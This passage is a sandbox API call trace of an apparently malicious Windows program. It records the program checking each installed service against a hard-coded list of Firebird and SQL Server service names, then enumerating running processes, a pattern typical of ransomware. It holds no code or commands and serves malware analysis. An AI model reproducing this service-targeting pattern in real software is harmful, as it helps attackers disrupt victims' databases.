lpString2="FontCache") returned -1 [0164.886] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0164.886] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0164.886] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0164.887] lstrlenW (lpString="gpsvc") returned 5 [0164.887] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0164.887] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0164.887] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0164.887] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0164.887] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0164.887] lstrlenW (lpString="iphlpsvc") returned 8 [0164.887] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0164.887] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0164.887] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0164.887] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0164.887] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0164.887] lstrlenW (lpString="KeyIso") returned 6 [0164.887] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0164.887] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0164.887] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0164.887] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0164.887] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0164.887] lstrlenW (lpString="LanmanServer") returned 12 [0164.887] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0164.887] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0164.887] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0164.887] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0164.887] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0164.887] lstrlenW (lpString="LanmanWorkstation") returned 17 [0164.887] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0164.887] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0164.887] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0164.888] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0164.888] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0164.888] lstrlenW (lpString="lfsvc") returned 5 [0164.888] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0164.888] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0164.888] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0164.888] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0164.888] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0164.888] lstrlenW (lpString="lmhosts") returned 7 [0164.888] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0164.888] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0164.888] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0164.888] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0164.888] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0164.888] lstrlenW (lpString="LSM") returned 3 [0164.888] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0164.888] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0164.888] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0164.888] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0164.888] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0164.888] lstrlenW (lpString="MpsSvc") returned 6 [0164.888] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0164.888] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0164.888] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0164.888] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0164.888] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0164.888] lstrlenW (lpString="NcbService") returned 10 [0164.888] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0164.889] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0164.889] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0164.889] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0164.889] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0164.889] lstrlenW (lpString="netprofm") returned 8 [0164.889] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0164.889] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0164.889] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0164.889] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0164.889] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0164.889] lstrlenW (lpString="NgcSvc") returned 6 [0164.889] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NgcSvc") returned -1 [0164.889] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NgcSvc") returned -1 [0164.889] lstrcmpiW (lpString1="sqlwriter", lpString2="NgcSvc") returned 1 [0164.889] lstrcmpiW (lpString1="mssqlserver", lpString2="NgcSvc") returned -1 [0164.889] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NgcSvc") returned 1 [0164.889] lstrlenW (lpString="NlaSvc") returned 6 [0164.889] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0164.889] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0164.889] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0164.889] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0164.889] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0164.889] lstrlenW (lpString="nsi") returned 3 [0164.889] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0164.889] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0164.889] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0164.890] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0164.890] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0164.890] lstrlenW (lpString="PcaSvc") returned 6 [0164.890] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0164.890] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0164.890] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0164.890] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0164.890] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0164.890] lstrlenW (lpString="PlugPlay") returned 8 [0164.890] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0164.890] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0164.890] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0164.890] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0164.890] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0164.890] lstrlenW (lpString="Power") returned 5 [0164.890] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0164.890] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0164.890] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0164.890] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0164.890] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0164.890] lstrlenW (lpString="ProfSvc") returned 7 [0164.890] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0164.890] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0164.890] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0164.890] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0164.891] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0164.891] lstrlenW (lpString="RpcEptMapper") returned 12 [0164.891] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0164.891] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0164.891] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0164.891] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0164.891] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0164.891] lstrlenW (lpString="RpcSs") returned 5 [0164.891] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0164.891] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0164.891] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0164.891] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0164.891] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0164.891] lstrlenW (lpString="SamSs") returned 5 [0164.891] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0164.891] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0164.891] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0164.891] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0164.891] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0164.891] lstrlenW (lpString="Schedule") returned 8 [0164.891] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0164.891] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0164.891] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0164.891] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0164.891] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0164.891] lstrlenW (lpString="SecurityHealthService") returned 21 [0164.892] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0164.892] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0164.892] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0164.892] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0164.892] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0164.892] lstrlenW (lpString="SENS") returned 4 [0164.892] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0164.892] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0164.892] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0164.892] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0164.892] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0164.892] lstrlenW (lpString="ShellHWDetection") returned 16 [0164.892] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0164.892] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0164.892] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0164.892] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0164.892] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0164.892] lstrlenW (lpString="Spooler") returned 7 [0164.892] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0164.892] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0164.892] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0164.892] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0164.892] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0164.892] lstrlenW (lpString="StateRepository") returned 15 [0164.892] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="StateRepository") returned -1 [0164.893] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="StateRepository") returned -1 [0164.893] lstrcmpiW (lpString1="sqlwriter", lpString2="StateRepository") returned -1 [0164.893] lstrcmpiW (lpString1="mssqlserver", lpString2="StateRepository") returned -1 [0164.893] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="StateRepository") returned -1 [0164.893] lstrlenW (lpString="SysMain") returned 7 [0164.893] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0164.893] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0164.893] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0164.893] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0164.893] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0164.893] lstrlenW (lpString="SystemEventsBroker") returned 18 [0164.893] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0164.893] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0164.893] lstrcmpiW (lpString1="sqlwriter", lpString2="SystemEventsBroker") returned -1 [0164.893] lstrcmpiW (lpString1="mssqlserver", lpString2="SystemEventsBroker") returned -1 [0164.893] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SystemEventsBroker") returned -1 [0164.893] lstrlenW (lpString="Themes") returned 6 [0164.893] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0164.893] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0164.893] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0164.893] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0164.893] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0164.893] lstrlenW (lpString="tiledatamodelsvc") returned 16 [0164.893] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0164.893] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0164.894] lstrcmpiW (lpString1="sqlwriter", lpString2="tiledatamodelsvc") returned -1 [0164.894] lstrcmpiW (lpString1="mssqlserver", lpString2="tiledatamodelsvc") returned -1 [0164.894] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4594008 | out: hHeap=0x6a0000) returned 1 [0164.894] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x52c [0164.897] Process32FirstW (in: hSnapshot=0x52c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0164.898] Process32NextW (in: hSnapshot=0x52c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0164.941] lstrlenW (lpString="System") returned 6 [0164.941] Process32NextW (in: hSnapshot=0x52c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0164.942] lstrlenW (lpString="smss.exe") returned 8 [0164.942] Process32NextW (in: hSnapshot=0x52c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0164.943] lstrlenW (lpString="csrss.exe") returned 9 [0164.943] Process32NextW (in: hSnapshot=0x52c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0164.944] lstrlenW (lpString="wininit.exe") returned 11 [0164.944] Process32NextW (in: hSnapshot=0x52c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0164.945] lstrlenW (lpString="csrss.exe") returned 9 [0164.945] Process32NextW (in: hSnapshot=0x52c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0164.946] lstrlenW (lpString="winlogon.exe") returned 12 [0164.947] Process32NextW (in: hSnapshot=0x52c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0164.947] lstrlenW (lpString="services.exe") returned 12 [0164.947] Process32NextW (in: hSnapshot=0x52c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0164.948] lstrlenW (lpString="lsass.exe") returned 9 [0164.948] Process32NextW (in: hSnapshot=0x52c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x230, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0164.949] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0164.949] Process32NextW (in: hSnapshot=0x52c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0164.950] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0164.950] Process32NextW (in: hSnapshot=0x52c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0164.951] lstrlenW (lpString="svchost.exe") returned 11 [0164.951] Process32NextW (in: hSnapshot=0x52c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0164.952] lstrlenW (lpString="svchost.exe") returned 11 [0164.952] Process32NextW (in: hSnapshot=0x52c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x230, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0164.953] lstrlenW (lpString="dwm.exe") returned 7 [0164.953] Process32NextW (in: hSnapshot=0x52c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3e, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0164.954] lstrlenW (lpString="svchost.exe") returned 11 [0164.954] Process32NextW (in: hSnapshot=0x52c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0164.954] lstrlenW (lpString="svchost.exe") returned 11 [0164.954] Process32NextW (in: hSnapshot=0x52c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0164.955] lstrlenW (lpString="svchost.exe") returned 11 [0164.955] Process32NextW (in: hSnapshot=0x52c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0164.956] lstrlenW (lpString="svchost.exe") returned 11 [0164.956] Process32NextW (in: hSnapshot=0x52c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x23, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0164.957] lstrlenW (lpString="svchost.exe") returned 11 [0164.957] Process32NextW (in: hSnapshot=0x52c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0164.958] lstrlenW (lpString="svchost.exe") returned 11 [0164.958] Process32NextW (in: hSnapshot=0x52c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0164.958] lstrlenW (lpString="svchost.exe") returned 11 [0164.958] Process32NextW (in: hSnapshot=0x52c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x544, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0164.959] lstrlenW (lpString="svchost.exe") returned 11 [0164.959] Process32NextW (in: hSnapshot=0x52c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0164.960] lstrlenW (lpString="svchost.exe") returned 11 [0164.960] Process32NextW (in: hSnapshot=0x52c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x57c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0164.962] lstrlenW (lpString="svchost.exe") returned 11 [0164.962] Process32NextW (in: hSnapshot=0x52c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0164.963] lstrlenW (lpString="spoolsv.exe") returned 11 [0164.963] Process32NextW (in: hSnapshot=0x52c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x680, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0164.964] lstrlenW (lpString="svchost.exe") returned 11 [0164.964] Process32NextW (in: hSnapshot=0x52c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0164.965] lstrlenW (lpString="audiodg.exe") returned 11 [0164.965] Process32NextW (in: hSnapshot=0x52c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x714, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0164.966] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0164.966] Process32NextW (in: hSnapshot=0x52c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x754, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0164.966] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0164.966] Process32NextW (in: hSnapshot=0x52c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0164.967] lstrlenW (lpString="Memory Compression") returned 18 [0164.967] Process32NextW (in: hSnapshot=0x52c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x854, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x3bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0164.968] lstrlenW (lpString="sihost.exe") returned 10 [0164.968] Process32NextW (in: hSnapshot=0x52c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, 